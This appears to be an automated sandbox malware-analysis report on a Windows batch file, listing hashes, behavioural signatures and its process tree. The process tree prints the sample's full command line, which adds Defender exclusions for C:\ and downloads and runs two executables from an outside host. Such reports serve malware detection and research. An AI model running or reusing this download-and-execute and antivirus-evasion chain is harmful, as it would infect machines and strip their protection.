Analysis
-
max time kernel
68s -
max time network
89s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
17/04/2023, 00:53
Static task
static1
Behavioral task
behavioral1
Sample
bat.bat
Resource
win10v2004-20230220-en
General
-
Target
bat.bat
-
Size
783B
-
MD5
e5a7e30c9537fae270681fbd0932239c
-
SHA1
ab0fd3323a32887647988c6e8e88554b5d7294f3
-
SHA256
a18071dc213c678538c1c7a1b3d5a7b562853bea75283bac89682479deaf1477
-
SHA512
f5abaf3c057a76f62c5b5722400301cad499cd83a5cbe018439f381afc27c8ab05e45ad22b093176e8506ea66c2d36d5fe25e41a784a52b14e37f39e54bc7241
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4532 powershell.exe 4532 powershell.exe 684 powershell.exe 684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4532 powershell.exe Token: SeDebugPrivilege 684 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4780 wrote to memory of 4532 4780 cmd.exe 85 PID 4780 wrote to memory of 4532 4780 cmd.exe 85 PID 4532 wrote to memory of 1464 4532 powershell.exe 86 PID 4532 wrote to memory of 1464 4532 powershell.exe 86 PID 1464 wrote to memory of 684 1464 cmd.exe 88 PID 1464 wrote to memory of 684 1464 cmd.exe 88
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\bat.bat'))"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k powershell -command add-mppreference -exclusionpath C:\ && powershell -command add-mppreference -exclusionprocess C:\ && powershell Start-BitsTransfer -Source https://gubukbali.com/tmp/sync.exe -Destination %USERPROFILE%\AppData\sync.exe && powershell Start-Process -FilePath %USERPROFILE%\AppData\sync.exe && powershell Start-BitsTransfer -Source https://gubukbali.com/tmp/qz.exe -Destination %USERPROFILE%\AppData\qz.exe && powershell Start-Process -FilePath %USERPROFILE%\AppData\qz.exe /priv3⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command add-mppreference -exclusionpath C:\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5eb4d127b8a6f84a1cee423c5e3e3a51d
SHA1c55263a8ff097067f2393ce2120801a445fd1949
SHA256d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514
SHA51245a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82